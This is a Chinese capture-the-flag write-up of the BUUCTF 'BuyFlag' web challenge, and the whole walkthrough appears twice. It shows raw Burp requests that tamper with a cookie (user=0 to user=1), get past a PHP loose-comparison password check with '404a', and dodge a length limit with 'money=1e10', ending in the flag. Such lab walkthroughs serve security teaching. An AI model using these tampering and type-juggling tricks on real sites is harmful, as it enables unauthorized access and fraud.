BUUCTF WEB [极客大挑战 2019]BuyFlag
-
进入环境后在MENU中发现PAYFLAG功能,点击进入,提示
FLAG FLAG NEED YOUR 100000000 MONEY ATTENTION If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! Only Cuit's students can buy the FLAG
说明想要购买flag需要满足三个条件
- be a student from CUIT
- be answer the correct password
- 100000000 MONEY
-
使用burp抓包
GET /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=0 Connection: close
猜测
Cookie
中的user
表示用户身份,条件1要求身份为student from CUIT,尝试将0改为1GET /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=1 Connection: close
提示
you are Cuiter Please input your password!!
-
F12查看网页源代码,发现一段注释
<!-- ~~~post money and password~~~ if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; } } -->
要求我们使用
POST
方法传送password和money变量,使用burp发送数据包POST /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Length: 29 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=1 Connection: close password=404a&money=100000000
提示
you are Cuiter Password Right! Nember lenth is too long
-
money的长度受到限制,尝试科学表达式
POST /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Length: 24 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=1 Connection: close password=404a&money=1e10
得到flag
you are Cuiter Password Right! flag{ccffe99d-8849-4c0c-960f-d468bf5877bc}
BUUCTF WEB [极客大挑战 2019]BuyFlag
-
进入环境后在MENU中发现PAYFLAG功能,点击进入,提示
FLAG FLAG NEED YOUR 100000000 MONEY ATTENTION If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! Only Cuit's students can buy the FLAG
说明想要购买flag需要满足三个条件
- be a student from CUIT
- be answer the correct password
- 100000000 MONEY
-
使用burp抓包
GET /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=0 Connection: close
猜测
Cookie
中的user
表示用户身份,条件1要求身份为student from CUIT,尝试将0改为1GET /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=1 Connection: close
提示
you are Cuiter Please input your password!!
-
F12查看网页源代码,发现一段注释
<!-- ~~~post money and password~~~ if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; } } -->
要求我们使用
POST
方法传送password和money变量,使用burp发送数据包POST /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Length: 29 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=1 Connection: close password=404a&money=100000000
提示
you are Cuiter Password Right! Nember lenth is too long
-
money的长度受到限制,尝试科学表达式
POST /pay.php HTTP/1.1 Host: a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Length: 24 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Origin: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://a6d2f3b2-7815-46b3-9c23-6a9ac372709b.node4.buuoj.cn:81/pay.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: user=1 Connection: close password=404a&money=1e10
得到flag
you are Cuiter Password Right! flag{ccffe99d-8849-4c0c-960f-d468bf5877bc}